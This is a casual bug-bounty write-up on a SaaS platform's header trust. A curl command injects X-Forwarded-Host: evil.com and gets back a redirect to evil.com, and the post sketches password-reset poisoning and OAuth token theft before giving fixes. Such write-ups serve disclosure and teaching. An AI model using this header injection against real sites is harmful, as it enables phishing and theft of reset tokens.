
☕ How I Redirected the Entire Startup to evil.com — With One Header

🧠 Context

There I was, sipping coffee at 3AM, pretending to be a responsible cybersecurity researcher (but actually waiting for Burp to throw me a bone).

I'm poking around a SaaS app that uses subdomains like customer1.startup.io, client456.startup.io, etc.

Then I notice… hmm… something smells like an open redirect. I sniff harder. ☕🔍

🔍 The Magic Header: X‑Forwarded‑Host

X‑Forwarded‑Host exists so that a reverse proxy can tell the backend which hostname the client originally asked for. It only means something when your own proxy sets it. This backend took it from anyone, straight off the wire, and used it to build absolute URLs.

Some genius dev somewhere thought:

"Let's trust whatever hostname the user sends, what could go wrong?"

What could go wrong? EVERYTHING.

🧪 Repro: One Curl to Rule Them All

I shot this simple curl:

curl -v http://client456.startup.io \
  -H "X-Forwarded-Host: evil.com" \
  -H "X-Forwarded-For: evil.com" \
  -H "X-Forwarded-Scheme: http" \
  -H "Host: originaldomain.startup.io"

Boom 💥

HTTP/1.1 303 See Other
Location: http://evil.com/install/update

They literally redirected users to evil.com — with full respect and no questions asked.

Thanks, backend ❤️

👀 The HTML Response? Cherry on Top

<meta http-equiv="refresh" content="0;url='http://evil.com/install/update'" />
<title>Redirecting to http://evil.com/install/update</title>

Bro really served a warm HTML redirect with a side of regret.

🚨 The Impact

So what if it's just a redirect? One caveat first: a victim's browser never sends X‑Forwarded‑Host on its own, so the attacker is the one supplying the header. The damage comes from whatever the server then does with that host on the victim's behalf: mailed links, OAuth callbacks, or a cached copy of the response if there's a cache in front keyed only on the real Host. Here's what can happen:

  • Password‑reset poisoning / phishing: if reset e‑mails build their link the same way, the attacker requests a reset for the victim with X‑Forwarded‑Host: evil.com, the victim gets a legit‑looking link, clicks it, and hands the reset token to evil.com → steal passwords
  • OAuth redirect_uri hijack: derive your callback URL from the forwarded host and the authorization code (or token) lands on evil.com. Ever heard of token theft?
  • Session fixation tricks
  • Trust issues: Literally

All thanks to this lovely blind trust in the X‑Forwarded‑Host.

🧪 But Wait, There's More™️

I tried another subdomain:

http://7821xyz.startup.io

Ran the same payload. Result? Redirected to evil.com again.

This wasn't a one‑off bug. The entire platform was sipping from the same poison teacup. ☕

💡 The Fix (Dear Developers)

  • 🛑 Stop trusting user‑supplied headers. X‑Forwarded‑Host is only meaningful when your own reverse proxy sets it, so have the proxy overwrite (not pass through) every X‑Forwarded‑* header, and have the backend honour them only on connections from that proxy (most frameworks have a trusted‑proxy setting for exactly this).
  • ✅ Allowlist known hosts: validate whatever hostname survives against your real tenant pattern (one label under startup.io, nothing else) and fall back to a configured canonical host when it doesn't match.
  • ✅ Use relative redirects like /dashboard, not full URLs. The browser resolves them against the origin it actually connected to, which no header can change.
  • ✅ Don't trust X‑Forwarded‑* unless you really, really know what you're doing, and that goes for the links you put in e‑mails, not just Location headers.

Or just let me keep redirecting your startup to evil.com. 😇

— AIwolfie

Open Redirect Header Injection Bug Bounty Cybersecurity